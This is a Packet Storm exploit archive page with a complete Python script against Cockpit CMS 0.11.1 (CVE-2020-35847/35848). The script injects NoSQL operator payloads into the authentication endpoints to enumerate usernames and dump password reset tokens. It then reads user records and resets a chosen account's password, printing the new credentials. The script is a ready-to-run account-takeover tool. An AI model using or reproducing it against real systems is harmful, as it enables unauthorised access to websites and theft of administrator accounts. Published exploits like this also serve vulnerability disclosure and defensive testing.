what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Cockpit CMS 0.11.1 NoSQL Injection

Cockpit CMS 0.11.1 NoSQL Injection
Posted Aug 10, 2021
Authored by Brian Ombongi

Cockpit CMS version 0.11.1 username enumeration and password reset NoSQL injection exploit.

tags | exploit, sql injection
advisories | CVE-2020-35847, CVE-2020-35848
SHA-256 | 6debd598ed60fd7113eefa3dd16534a89ff8de59b195a5d4f144f59fa41618bb

Cockpit CMS 0.11.1 NoSQL Injection

Change Mirror Download
# Exploit Title: Cockpit CMS 0.11.1 - 'Username Enumeration & Password Reset' NoSQL Injection 
# Date: 06-08-2021
# Exploit Author: Brian Ombongi
# Vendor Homepage: https://getcockpit.com/
# Version: Cockpit 0.11.1
# Tested on: Ubuntu 16.04.7
# CVE : CVE-2020-35847 & CVE-2020-35848

#!/usr/bin/python3
import json
import re
import requests
import random
import string
import argparse


def usage():
guide = 'python3 exploit.py -u <target_url> '
return guide

def arguments():
parse = argparse.ArgumentParser(usage=usage())
parse.add_argument('-u', dest='url', help='Site URL e.g http://cockpit.local', type=str, required=True)
return parse.parse_args()

def test_connection(url):
try:
get = requests.get(url)
if get.status_code == 200:
print(f"[+] {url}: is reachable")
else:
print(f"{url}: is Not reachable, status_code: {get.status_code}")
except requests.exceptions.RequestException as e:
raise SystemExit(f"{url}: is Not reachable \nErr: {e}")


def enumerate_users(url):
print("[-] Attempting Username Enumeration (CVE-2020-35846) : \n")
url = url + "/auth/requestreset"
headers = {
"Content-Type": "application/json"
}
data= {"user":{"$func":"var_dump"}}
req = requests.post(url, data=json.dumps(data), headers=headers)
pattern=re.compile(r'string\(\d{1,2}\)\s*"([\w-]+)"', re.I)
matches = pattern.findall(req.content.decode('utf-8'))
if matches:
print ("[+] Users Found : " + str(matches))
return matches
else:
print("No users found")

def check_user(usernames):
user = input("\n[-] Get user details For : ")
if user not in usernames:
print("User does not exist...Exiting")
exit()
else:
return user


def reset_tokens(url):
print("[+] Finding Password reset tokens")
url = url + "/auth/resetpassword"
headers = {
"Content-Type": "application/json"
}
data= {"token":{"$func":"var_dump"}}
req = requests.post(url, data=json.dumps(data), headers=headers)
pattern=re.compile(r'string\(\d{1,2}\)\s*"([\w-]+)"', re.I)
matches = pattern.findall(req.content.decode('utf-8'))
if matches:
print ("\t Tokens Found : " + str(matches))
return matches
else:
print("No tokens found, ")


def user_details(url, token):
print("[+] Obtaining user information ")
url = url + "/auth/newpassword"
headers = {
"Content-Type": "application/json"
}
userAndtoken = {}
for t in token:
data= {"token":t}
req = requests.post(url, data=json.dumps(data), headers=headers)
pattern=re.compile(r'(this.user\s*=)([^;]+)', re.I)
matches = pattern.finditer(req.content.decode('utf-8'))
for match in matches:
matches = json.loads(match.group(2))
if matches:
print ("-----------------Details--------------------")
for key, value in matches.items():

print("\t", "[*]", key ,":", value)
else:
print("No user information found.")
user = matches['user']
token = matches['_reset_token']
userAndtoken[user] = token
print("--------------------------------------------")
continue
return userAndtoken

def password_reset(url, token, user):
print("[-] Attempting to reset %s's password:" %user)
characters = string.ascii_letters + string.digits + string.punctuation
password = ''.join(random.choice(characters) for i in range(10))
url = url + "/auth/resetpassword"
headers = {
"Content-Type": "application/json"
}
data= {"token":token, "password":password}
req = requests.post(url, data=json.dumps(data), headers=headers)
if "success" in req.content.decode('utf-8'):
print("[+] Password Updated Succesfully!")
print("[+] The New credentials for %s is: \n \t Username : %s \n \t Password : %s" % (user, user, password))

def generate_token(url, user):
url = url + "/auth/requestreset"
headers = {
"Content-Type": "application/json"
}
data= {"user":user}
req = requests.post(url, data=json.dumps(data), headers=headers)

def confirm_prompt(question: str) -> bool:
reply = None
while reply not in ("", "y", "n"):
reply = input(f"{question} (Y/n): ").lower()
if reply == "y":
return True
elif reply == "n":
return False
else:
return True

def pw_reset_trigger(details, user, url):
for key in details:
if key == user:
password_reset(url, details[key], key)
else:
continue



if __name__ == '__main__':
args = arguments()
url = args.url
test_connection(url)
user = check_user(enumerate_users(url))
generate_token(url, user)
tokens = reset_tokens(url)
details = user_details(url, tokens)
print("\n")
b = confirm_prompt("[+] Do you want to reset the passowrd for %s?" %user)
if b:
pw_reset_trigger(details, user, url)
else:
print("Exiting..")
exit()

Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    0 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close